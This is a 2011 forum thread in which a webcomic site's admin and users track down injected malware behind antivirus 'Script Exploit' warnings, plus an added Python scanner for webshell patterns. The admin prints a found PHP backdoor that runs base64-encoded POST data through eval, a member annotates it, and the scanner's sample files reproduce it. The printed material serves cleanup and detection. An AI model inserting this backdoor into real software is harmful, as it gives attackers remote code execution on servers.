Apr 19 2011, 10:33 AM Post #1
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

In the last couple of hours I've taken more steps to strengthen this site against hackers, but there will always be vulnerabilities that are harder to catch - basically, legions of hackers in poor countries can make money by finding new holes in code, therefore they always will.

If you get a virus/trojan/etc. warning from this or any of my sites please let me know immediately. Give me as many details as possible, either copy and paste text or with a screenshot of the details of the warning.

I will always try my best to keep this place secure, but there's only so much that can be done by myself and the team here.

If you're not running any anti-malware, anti-virus, or a firewall then I highly recommend getting at the very least the Windows security software (which is a lot better than it used to be): http://www.microsoft.com/en-us/security_es...ls/default.aspx

And get your browser vulnerabilities patched with Spybot: http://www.safer-networking.org/en/index.html

Thanks for your help and patience. If anything comes up then please let me know ASAP!

--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog The Matazone Shop The Matazone Blog The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!

Apr 19 2011, 10:48 PM Post #2
I plug directly into my computer Group: Established Members Posts: 3,640 Joined: 18-November 04 From: Manchester Member No.: 1,488 Gender: Male

AVG popped these up when Firefox tried to load the RSS feed from your blog.

--------------------
QUOTE (Peter Griffin) Math, my dear boy, is nothing more than the lesbian sister of biology.

Apr 20 2011, 08:14 AM Post #3
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Apr 20 2011, 03:12 PM Post #4
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

I've had a try at fixing that. Could you see if it's worked please?

Apr 20 2011, 05:59 PM Post #5
dream to make believe Group: Established Members Posts: 2,522 Joined: 12-January 04 From: England Member No.: 863 Gender: Female

AVG is still throwing up a "Threat was blocked" warning occasionally when I come to the forum, forgot to get a shot of it though... will try and remember next time it comes up!

Apr 20 2011, 09:17 PM Post #6
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

I got a script hidden in the forum code this afternoon too. It was pretty obscure so was unlikely to be triggered often. Let me know if it happens again please, but hopefully it's fixed.

Apr 21 2011, 10:48 AM Post #7
Wait for the uprising Group: Established Members Posts: 3,177 Joined: 7-April 05 From: In a cave in Scotland Member No.: 1,735 Gender: Female

After realising that there's nowhere online I'd host a screenshot of the AVG threat, I messaged it to you on fb, Mata.

It was from the search newposts page.

--------------------
We are unraveling our navels so that we may ingest the sun. DARIA IZ GOOD ON TOAST TOAST IZ GOOD ON DARIA

Apr 21 2011, 11:05 AM Post #8
I plug directly into my computer Group: Established Members Posts: 3,640 Joined: 18-November 04 From: Manchester Member No.: 1,488 Gender: Male

> Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Yeah, I think that's got it. At least AVG's not objecting anymore.

Apr 21 2011, 11:19 AM Post #9
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

Daria is still seeing it, it seems.

Can anyone get a consistent reproduction of this problem?

Daria, can you get the error if you refresh your cached files? (I'm hoping that the script I found yesterday might have been the problem and it was lurking in your cache... But I think that's wishful thinking.)

Apr 21 2011, 02:31 PM Post #10
I plug directly into my computer Group: Established Members Posts: 3,640 Joined: 18-November 04 From: Manchester Member No.: 1,488 Gender: Male

Speak of the devil, different day, different computer and I get:

Apr 21 2011, 02:57 PM Post #11
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

Righty ho, I've finally managed to locate one nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

```php
if (isset($_GET["cookie"])) {
    echo 'cookie=4';
    if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"]));
    exit;
}
```

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

Apr 22 2011, 06:39 PM Post #12
Has been kidnapped by gerbils and forced to post on here repeatedly Group: Established Members Posts: 1,088 Joined: 18-September 03 From: London Member No.: 606 Gender: Female

> Righty ho, I've finally managed to locate one nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php
>
> I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.
>
> The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.
>
> Another tricky one I've found hidden on a couple of files was this:
>
> ```php
> if (isset($_GET["cookie"])) {
>     echo 'cookie=4';
>     if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"]));
>     exit;
> }
> ```
>
> I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.
>
> So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

Hmm... my guess would be it's to hijack your admin session.

```php
if (isset($_GET["cookie"])) { // check if a cookie was sent in the request (i.e. user is logged in)
    echo 'cookie=4'; // useless
    if (isset($_POST["a9707a3e38"])) // check if some POST variable was sent in the HTTP request. You'd have to be redirected here from a malicious site for this to be true
        @eval(base64_decode($_POST["a9707a3e38"])); // execute it as PHP code
    exit; // useless
}
```

--------------------
Kung fu fighting from 25th April 2010
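The text search described in post #11 and the `eval(base64_decode(...))` line annotated in post #12, written out as a small scanner that also catches mixed-case calls and eval fed directly from request data. This is an added example, not code from the thread or from the forum software; the rule names, severities, file extensions and every sample file other than the `lang_global.php` snippet are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

# Ordered strongest signal first. PHP function names are case-insensitive,
# so a case-sensitive search for the literal 'base64_decode' can miss a call.
RULES = [
    ("request-eval", "high", r"\beval\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    ("decoded-eval", "high",
     r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    # A decoder call on its own is a lead to review by hand, not proof.
    ("decoder-call", "review", r"\bbase64_decode\s*\("),
]
COMPILED = [(name, sev, re.compile(rx, re.IGNORECASE)) for name, sev, rx in RULES]
PHP_SUFFIXES = {".php", ".inc", ".phtml"}  # assumption: extensions the server executes

def scan_text(text):
    """Return (line_no, rule, severity) for the strongest rule hit on each line."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, severity, pattern in COMPILED:
            if pattern.search(line):
                hits.append((line_no, name, severity))
                break  # rules are ordered, so the first match is the strongest
    return hits

def scan_tree(root):
    """Scan every PHP-like file under root, cache directories included."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            rel = path.relative_to(root).as_posix()
            findings += [(rel, *hit) for hit in scan_text(text)]
    return findings

# Constructed sample tree. Only the lang_global.php snippet comes from the
# thread; the other three files are made up for the demonstration.
SAMPLE_FILES = {
    "forums/cache/lang_cache/en/lang_global.php": """<?php
$lang = array();
if (isset($_GET["cookie"])) {
    echo 'cookie=4';
    if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"]));
    exit;
}
""",
    "comic/tpl/footer.php": "<?php\nEVAL(GzInflate(Base64_Decode($blob)));\n",
    "comic/includes/mail.php": "<?php\n$body = base64_decode($attachment);\n",
    "index.php": "<?php\necho 'hello';\n",
}

def demo():
    """Write the sample tree to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, content in SAMPLE_FILES.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content, encoding="utf-8")
        return scan_tree(tmp)

if __name__ == "__main__":
    for finding in demo():
        print(*finding, sep="\t")
```

To check a real site, call `scan_tree()` on a copy of the document root and read the `high` findings first.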

Apr 22 2011, 07:27 PM Post #13
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

We should be good in that regard - the admin sessions are very short on here.

Has anyone had any new problems since yesterday afternoon?

Apr 23 2011, 08:25 PM Post #14
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere. I've run scans through my whole server for iframe commands and couldn't find this one. I couldn't find any nasty base64_decode commands either, so I don't think it's concealed in there. I've scanned all of my databases for iframe commands and I don't think it's in there either.

Help! Any suggestions to help find it appreciated.

Apr 23 2011, 10:22 PM Post #15
Transdimensional Traveler Group: Established Members Posts: 1,322 Joined: 20-August 04 From: Somewhere in the Æther Member No.: 1,244 Gender: Secret

If you have the funding, try creating another domain like test.matazone.co.uk and recreate the comic.matazone.co.uk site there.

That way, once it is set up to your liking, you can find if the scan is a remnant of the past infection or if there is an underlying issue to be resolved.

--------------------
It is by caffeine alone I set my mind in motion,
It is by the beans of Java that thoughts acquire speed,
The hands acquire shaking, the shaking becomes a warning,
It is by caffeine alone I set my mind in motion.
Jack of all trades, master of none, though offtimes better than master of one.
Carpe Noctem, pro cras nos necemus
Carpe Diem, pro hodie nos mutiamo

Apr 24 2011, 01:46 AM Post #16
Wait for the uprising Group: Established Members Posts: 3,177 Joined: 7-April 05 From: In a cave in Scotland Member No.: 1,735 Gender: Female

I got it again today, twice: once on the Mittens Zombie Game, and once on the search new posts page. Forgot to get a screenshot of either one, I'm afraid :/

On a different note, I went back through the Mr Snaffleburger cartoons today because I was showing them to a friend. I found it interesting, Mata, that they were probably a huge influence on how I thought about corporate advertising and capitalism when I was in my early teens. So, thank you!

Apr 24 2011, 09:43 AM Post #17
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

I'd deleted the installation of PHPads and the associated database a couple of weeks ago after suspecting that this was the problem, but it seems that somehow the evocation code was somehow compromised. I've no idea how, because the links pointed to a folder on my site and I know for a fact that the folder doesn't exist any more...

Still, I think that this has probably fixed the issue, so you're all back on watch again please - let me know if you see any trojan warnings again please!

Daria: my work here is done

Apr 24 2011, 10:44 AM Post #18
Advice for the young at heart Group: Moderators Posts: 2,705 Joined: 26-February 03 From: Essex, UK Member No.: 33 Gender: Male

> Okay, I've found this: http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk Apparently it's on my comic, but I can't find it bloody anywhere.

Your site has been showing up as clear for me, and I haven't had any alerts from virus or spyware software this time around. I've clicked my way through most of the forum and comic pages to see if anything has flagged up but nothing so far. Could it be browser-specific?

Apr 24 2011, 07:39 PM Post #19
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

Possibly, but hopefully I've fixed it!

Apr 25 2011, 09:18 AM Post #20
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

I've had one report of Kaspersky still being grumpy on my comic. Could people with AVG or Kaspersky clear their cached internet files and refresh the page on my comic please?

I'm really hoping I've got it fixed, but I need to know if it's not. I have never had any warnings with Firefox, Windows Security Essentials, and Spybot blocking script exploits, so I can't see these problems myself.

Confirmation one way or another would be appreciated!

Apr 25 2011, 07:50 PM Post #21
Flaps and spins on the spot Group: Established Members Posts: 2,651 Joined: 17-June 03 From: At the end of the road to nowhere.....literally! Member No.: 390 Gender: Female

Got a blocked threat message but don't know how to paste it here

--------------------
Hope confidently, do valiantly, wait patiently!
Rather light a candle than complain about the dark!
Enjoy what you have and hope for what you lack
Thoughts become things, choose the good ones
Carpe diem

Apr 26 2011, 07:59 AM Post #22
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

Last night (about midnight UK time) I got desperate and overwrote the entire main layout template for my comic and I hope that's solved the problem there, although I would have much rather found the problem so I could identify it more easily in the future.

Pixie: did you get a warning while on my comic or on these forums? If it's on here then that's going to be a lot harder to fix, and I'm going to have to rest in the hands of Mr Fuzzy on that one. If there's anything nasty lurking on the forums (you know, other than SPS*) then I've got no idea how to find it past what I've already tried.

You can use the 'Prt Sc' button to take a screenshot of whatever is on your screen at the time. You can then paste it into MS Paint (or Photoshop preferably) and save the file. You can then attach the file to a message on Facebook.

*(We love you really, SPS).

Apr 29 2011, 11:59 AM Post #23
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

I've had one report of a trojan still lurking on the forums. Has anyone else seen this? It's the same as before: detected with AVG and suggesting that the problem is 'Script Exploit type 1702'. Once again, I can't find anything untoward in the code.

Apr 30 2011, 07:56 AM Post #24
I plug directly into my computer Group: Established Members Posts: 3,640 Joined: 18-November 04 From: Manchester Member No.: 1,488 Gender: Male

Yeah, I've started getting the same messages as above. Only sporadically though, not every time I come on matazone.co.uk, but they can be set off by the forums, the comic, the blog...

Apr 30 2011, 12:03 PM Post #25
'Trouble Down Pit' now online! Group: Admin Posts: 10,141 Joined: 22-February 03 From: Southern UK Member No.: 1 Gender: Male

Rargh!

Okay, please take a screen shot with the 'more details' tab revealed, and note the URL and time please.

I've got no idea where to start. I don't know enough about this to say what it could be, but is it possible that there is something on the server itself, not actually on my pages, that is randomly blipping a trojan warning out to any .php page?